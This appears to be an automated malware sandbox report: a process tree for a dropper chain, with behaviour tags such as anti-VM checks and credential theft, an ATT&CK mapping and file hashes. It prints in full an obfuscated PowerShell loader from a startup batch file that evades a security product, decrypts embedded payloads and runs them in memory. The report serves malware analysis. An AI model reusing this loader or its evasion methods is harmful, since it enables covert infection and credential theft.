C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2004,2541652093298288299,14069610132180498768,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3200 /prefetch:28⤵PID:6516
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2004,2541652093298288299,14069610132180498768,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3408 /prefetch:28⤵PID:1876
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2004,2541652093298288299,14069610132180498768,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3184 /prefetch:18⤵
- Uses browser remote debugging
PID:6988
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2004,2541652093298288299,14069610132180498768,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3176 /prefetch:18⤵
- Uses browser remote debugging
PID:1632
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2004,2541652093298288299,14069610132180498768,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3404 /prefetch:28⤵PID:2436
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2004,2541652093298288299,14069610132180498768,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2800 /prefetch:28⤵PID:6252
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2004,2541652093298288299,14069610132180498768,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4064 /prefetch:28⤵PID:5644
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2004,2541652093298288299,14069610132180498768,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3952 /prefetch:28⤵PID:5852
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"7⤵
- Uses browser remote debugging
PID:6764 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffccb6b46f8,0x7ffccb6b4708,0x7ffccb6b47188⤵PID:5468
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1972,17271567041197746728,12179851707380238612,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2008 /prefetch:28⤵PID:4820
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1972,17271567041197746728,12179851707380238612,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1836 /prefetch:38⤵PID:6348
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1972,17271567041197746728,12179851707380238612,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2024 /prefetch:88⤵PID:2248
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1972,17271567041197746728,12179851707380238612,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2564 /prefetch:28⤵PID:3424
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1972,17271567041197746728,12179851707380238612,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:18⤵
- Uses browser remote debugging
PID:1000
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1972,17271567041197746728,12179851707380238612,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:18⤵
- Uses browser remote debugging
PID:1032
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1972,17271567041197746728,12179851707380238612,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2860 /prefetch:28⤵PID:1976
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1972,17271567041197746728,12179851707380238612,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2536 /prefetch:28⤵PID:5376
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1972,17271567041197746728,12179851707380238612,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3052 /prefetch:28⤵PID:1364
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1972,17271567041197746728,12179851707380238612,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2416 /prefetch:28⤵PID:6880
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1972,17271567041197746728,12179851707380238612,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2424 /prefetch:28⤵PID:7128
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1972,17271567041197746728,12179851707380238612,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2564 /prefetch:28⤵PID:5108
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1972,17271567041197746728,12179851707380238612,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2424 /prefetch:28⤵PID:1208
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6920 -s 10526⤵
- Program crash
PID:2708
-
-
-
C:\Users\Admin\AppData\Local\Temp\1086634001\DTQCxXZ.exe"C:\Users\Admin\AppData\Local\Temp\1086634001\DTQCxXZ.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:736
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1086635041\tYliuwV.ps1"5⤵
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5860 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat"6⤵
- System Location Discovery: System Language Discovery
PID:2520 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat';$MoqZ='DeKyLvcoKyLvmprKyLveKyLvssKyLv'.Replace('KyLv', ''),'EJwaGlemJwaGeJwaGnJwaGtJwaGAtJwaG'.Replace('JwaG', ''),'CrgSdPegSdPagSdPtgSdPegSdPDecgSdPrypgSdPtorgSdP'.Replace('gSdP', ''),'EnAUSatAUSaryAUSaPAUSaoiAUSantAUSa'.Replace('AUSa', ''),'RifKyeaifKydifKyLiifKyneifKysifKy'.Replace('ifKy', ''),'CoIpkTpyIpkTTIpkToIpkT'.Replace('IpkT', ''),'LRxQFoRxQFaRxQFdRxQF'.Replace('RxQF', ''),'ChPYPIanPYPIgPYPIePYPIExPYPItenPYPIsioPYPInPYPI'.Replace('PYPI', ''),'SplhjTaihjTathjTa'.Replace('hjTa', ''),'IVERYnvoVERYkeVERY'.Replace('VERY', ''),'MaGACXinMGACXoduGACXlGACXeGACX'.Replace('GACX', ''),'GetEffVCuEffVrreEffVnEffVtPEffVroEffVceEffVsEffVsEffV'.Replace('EffV', ''),'TrgFlMagFlMnsgFlMfogFlMrmgFlMFingFlMalgFlMBgFlMlogFlMcgFlMkgFlM'.Replace('gFlM', ''),'FZnjbroZnjbmBaZnjbseZnjb64ZnjbSZnjbtZnjbrinZnjbgZnjb'.Replace('Znjb', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($MoqZ[11])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function OcByW($zyHkO){$MahHK=[System.Security.Cryptography.Aes]::Create();$MahHK.Mode=[System.Security.Cryptography.CipherMode]::CBC;$MahHK.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$MahHK.Key=[System.Convert]::($MoqZ[13])('AAMGkknb01QKxJVl43m9//ZRwVkG6pEiu9VVo6uyG5U=');$MahHK.IV=[System.Convert]::($MoqZ[13])('/W6oLxKJHKSzHfvUm38XsQ==');$RyLXH=$MahHK.($MoqZ[2])();$Vocox=$RyLXH.($MoqZ[12])($zyHkO,0,$zyHkO.Length);$RyLXH.Dispose();$MahHK.Dispose();$Vocox;}function dAZyU($zyHkO){$CHeOb=New-Object System.IO.MemoryStream(,$zyHkO);$PxKaw=New-Object System.IO.MemoryStream;$ikNUp=New-Object System.IO.Compression.GZipStream($CHeOb,[IO.Compression.CompressionMode]::($MoqZ[0]));$ikNUp.($MoqZ[5])($PxKaw);$ikNUp.Dispose();$CHeOb.Dispose();$PxKaw.Dispose();$PxKaw.ToArray();}$ygeKx=[System.IO.File]::($MoqZ[4])([Console]::Title);$WLLeN=dAZyU (OcByW ([Convert]::($MoqZ[13])([System.Linq.Enumerable]::($MoqZ[1])($ygeKx, 5).Substring(2))));$PCQGF=dAZyU (OcByW ([Convert]::($MoqZ[13])([System.Linq.Enumerable]::($MoqZ[1])($ygeKx, 6).Substring(2))));[System.Reflection.Assembly]::($MoqZ[6])([byte[]]$PCQGF).($MoqZ[3]).($MoqZ[9])($null,$null);[System.Reflection.Assembly]::($MoqZ[6])([byte[]]$WLLeN).($MoqZ[3]).($MoqZ[9])($null,$null); "7⤵PID:2588
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe7⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2356 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2812
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1086636001\oVpNTUm.exe"C:\Users\Admin\AppData\Local\Temp\1086636001\oVpNTUm.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:6648
-
-
C:\Users\Admin\AppData\Local\Temp\1086637001\qFqSpAp.exe"C:\Users\Admin\AppData\Local\Temp\1086637001\qFqSpAp.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5988
-
-
C:\Users\Admin\AppData\Local\Temp\1086638001\Bjkm5hE.exe"C:\Users\Admin\AppData\Local\Temp\1086638001\Bjkm5hE.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:5316 -
C:\Users\Admin\AppData\Local\Temp\1086638001\Bjkm5hE.exe"C:\Users\Admin\AppData\Local\Temp\1086638001\Bjkm5hE.exe"6⤵
- Executes dropped EXE
PID:2416
-
-
C:\Users\Admin\AppData\Local\Temp\1086638001\Bjkm5hE.exe"C:\Users\Admin\AppData\Local\Temp\1086638001\Bjkm5hE.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2196
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5316 -s 10526⤵
- Program crash
PID:5280
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2e3683.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2e3683.exe3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5040
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3S70g.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3S70g.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4736
-
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4280
-
C:\ProgramData\famphw\vxjrl.exeC:\ProgramData\famphw\vxjrl.exe start21⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3844
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:652
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 4932 -ip 49321⤵PID:4536
-
C:\ProgramData\famphw\vxjrl.exeC:\ProgramData\famphw\vxjrl.exe start21⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2304
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5336
-
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exeC:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe1⤵
- Executes dropped EXE
PID:5420
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 6920 -ip 69201⤵PID:6764
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 2196 -ip 21961⤵PID:1196
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:2444
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:6340
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 6400 -ip 64001⤵PID:6356
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2400 -ip 24001⤵PID:5132
-
C:\ProgramData\emmeu\sgimsa.exeC:\ProgramData\emmeu\sgimsa.exe start21⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:7160
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5316 -ip 53161⤵PID:5488
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
4Windows Service
4Modify Authentication Process
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
4Windows Service
4Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
5Disable or Modify Tools
5Modify Authentication Process
1Modify Registry
6Virtualization/Sandbox Evasion
2Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Modify Authentication Process
1Steal Web Session Cookie
1Unsecured Credentials
3Credentials In Files
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
782B
MD516d76e35baeb05bc069a12dce9da83f9
SHA1f419fd74265369666595c7ce7823ef75b40b2768
SHA256456b0f7b0be895af21c11af10a2f10ce0f02ead47bdf1de8117d4db4f7e4c3e7
SHA5124063efb47edf9f8b64ef68ad7a2845c31535f3679b6368f9cb402411c7918b82bd6355982821bfb3b7de860b5979b8b0355c15f4d18f85d894e2f2c8e95ef18e
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
2KB
MD525604a2821749d30ca35877a7669dff9
SHA149c624275363c7b6768452db6868f8100aa967be
SHA2567f036b1837d205690b992027eb8b81939ba0228fc296d3f30039eeba00bd4476
SHA512206d70af0b332208ace2565699f5b5da82b6a3806ffa51dd05f16ab568a887d63449da79bbaeb46183038837446a49515d62cb6615e5c5b27563cd5f774b93f5
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\21c83846-4e22-470b-a414-74ed52b57851.dmp
Filesize10.5MB
MD5103a0f69eb1dad5c2f51418ee1611d52
SHA1c9169babb650686c6c6861ae435eafc313acff3f
SHA2568506326409813b2d2202e467f1c27150032d7e6c00c2d0bf86bd0a9ada16bbd7
SHA5123c742e638bcb147ad1c914711ce77e7d2db0fe9d6f6af495e8f28f3b8f2c0795514a2595a44de956ca67f4262b163521d786dd3c88e59d71dd68145a21f1d106
-
Filesize
152B
MD59f4a0b24e1ad3a25fc9435eb63195e60
SHA1052b5a37605d7e0e27d8b47bf162a000850196cd
SHA2567d70a8fc286520712421636b563e9ee32335bca9a5be764544a084c77ddd5feb
